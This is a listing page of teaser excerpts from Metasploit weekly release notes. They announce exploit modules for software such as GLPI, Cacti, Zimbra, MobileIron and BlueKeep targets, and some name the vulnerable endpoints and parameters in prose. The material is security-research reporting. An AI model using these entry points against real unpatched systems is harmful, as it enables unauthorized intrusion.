4 min
Metasploit Weekly Wrapup
Metasploit Weekly Wrap-Up: 4/14/23
Rocket Software UniRPC Exploits
Ron Bowes [https://github.com/rbowes-r7] submitted two exploit modules
[https://github.com/rapid7/metasploit-framework/pull/17832] for vulnerabilities
he discovered
[https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed/]
in the UniRPC server for Rocket Software’s UniData product. The first exploit
module, exploit/linux/misc/unidata_udadmin_auth_bypass exploits an
authentication bypass to ultimately gain remot
2 min
Metasploit
Metasploit Weekly Wrap-Up: 1/27/23
Cacti Unauthenticated Command Injection
Thanks to community contributor Erik Wynter [https://github.com/ErikWynter],
Metasploit Framework now has an exploit module
[https://github.com/rapid7/metasploit-framework/pull/17407] for an
unauthenticated command injection vulnerability in the Cacti network-monitoring
software. The vulnerability is due to a proc_open() call that accepts
unsanitized user input in remote_agent.php. Provided that the target server has
data that's tied to the POLLER_ACTION_S
3 min
Metasploit
Metasploit Weekly Wrap-Up: Oct. 28, 2022
GLPI htmLawed PHP Command Injection
Our very own bwatters-r7 [https://github.com/bwatters-r7] wrote a module for an
unauthenticated PHP command injection vulnerability that exists in various
versions of GLPI. The vulnerability is due to a third-party vendor test script
being present in default installations. A POST request to
vendor/htmlawed/htmlawed/htmLawedTest.php directly allows an attacker to execute
exec() through the hhook and test parameters, resulting in unauthenticated RCE
as the www
3 min
Metasploit
Metasploit Wrap-Up: Aug. 26, 2022
Zimbra Auth Bypass to Shell
Ron Bowes [https://github.com/rbowes-r7] added an exploit module
[https://github.com/rapid7/metasploit-framework/pull/16922] that targets
multiple versions of Zimbra Collaboration Suite. The module leverages an
authentication bypass (CVE-2022-37042) and a directory traversal vulnerability
(CVE-2022-27925) to gain code execution as the zimbra user. The auth bypass
functionality correctly checks for a valid session; however, the function that
performs the check does not
3 min
Metasploit
Metasploit Weekly Wrap-Up: 8/5/22
Log4Shell in MobileIron Core
Thanks to jbaines-r7 [https://github.com/jbaines-r7] we have yet another
Log4Shell exploit [https://github.com/rapid7/metasploit-framework/pull/16837].
Similar to the other Log4Shell exploit modules, the exploit works by sending a
JNDI string that once received by the server will be deserialized, resulting in
unauthenticated remote code execution as the tomcat user. Vulnerable versions of
MobileIron Core have been reported as exploited
[https://www.mandiant.com/resou
2 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up: 4/29/22
Module additions this week to enumerate all installed AV products on Windows and escape sandboxes on certain Debian-specific Redis versions. Plus, a new place for Metasploit docs focused on pen testing workflows.
4 min
Metasploit
Metasploit Weekly Wrap-Up: Mar. 4, 2022
This week’s Metasploit Framework release brings us seven new modules.
IP Camera Exploitation
Rapid7’s Jacob Baines [https://github.com/jbaines-r7] was busy this week with
two exploit modules that target IP cameras. The first
[https://github.com/rapid7/metasploit-framework/pull/16190] module exploits an
authenticated file upload on Axis IP cameras. Due to lack of proper
sanitization, an attacker can upload and install an eap application which, when
executed, will grant the attacker root privileg
3 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up: Jun. 25, 2021
Three fresh modules for Cisco targets and rConfig, plus new enhancements and fixes.
4 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up: Mar. 19, 2021
A local exploit for a Windows Server 2012 DLL hijacking vulnerability, plus a slew of fixes and improvements.
2 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up: 11/13/20
Four new modules, including an exploit for SaltStack Salt and an exploit for a now-patched vuln in Metasploit, plus new enhancements and fixes.
2 min
Metasploit
Metasploit Wrap-Up: 7/17/20
Plex unpickling
The exploit/windows/http/plex_unpickle_dict_rce module
[https://github.com/rapid7/metasploit-framework/pull/13741] by h00die
[https://github.com/h00die] exploits an authenticated Python deserialization
vulnerability in Plex Media Server. The module exploits the vulnerability by
creating a photo library and uploading a Dict file containing a Python payload
to the library’s path. Code execution is then achieved by triggering the plugin
loading functionality, which unpickles the Dic
2 min
Metasploit
Metasploit Wrap-Up: 6/19/20
Arista Shell Escape Exploit
Community contributor SecurityBytesMe [https://github.com/SecurityBytesMe] added
an exploit module [https://github.com/rapid7/metasploit-framework/pull/13303]
for various Arista switches. With credentials, an attacker can SSH into a
vulnerable device and leverage a TACACS+ shell configuration to bypass
restrictions. The configuration allows the pipe character to be used only if the
pipe is preceded by a grep command. This configuration ultimately allows the
chaining
2 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up: 3/20/20
Five new modules plus fixes and enhancements. Exploits for ManageEngine, rConfig, and SQL Server Reporting Services, among others.
7 min
Metasploit
Metasploit Shellcode Grows Up: Encrypted and Authenticated C Shells
Introducing encrypted, compiled payloads in Metasploit Framework 5
2 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up 9/27/19
BlueKeep is Here
The BlueKeep exploit module
[https://github.com/rapid7/metasploit-framework/pull/12283] is now officially a
part of Metasploit Framework. This module reached merged status thanks to lots
of collaboration between Rapid7 and the MSF community members. The module
requires some manual configuration per target, and targets include both
virtualized and non-virtualized versions of Windows 7 and Windows Server 2008.
For a full overview of the exploit’s development and notes on use and d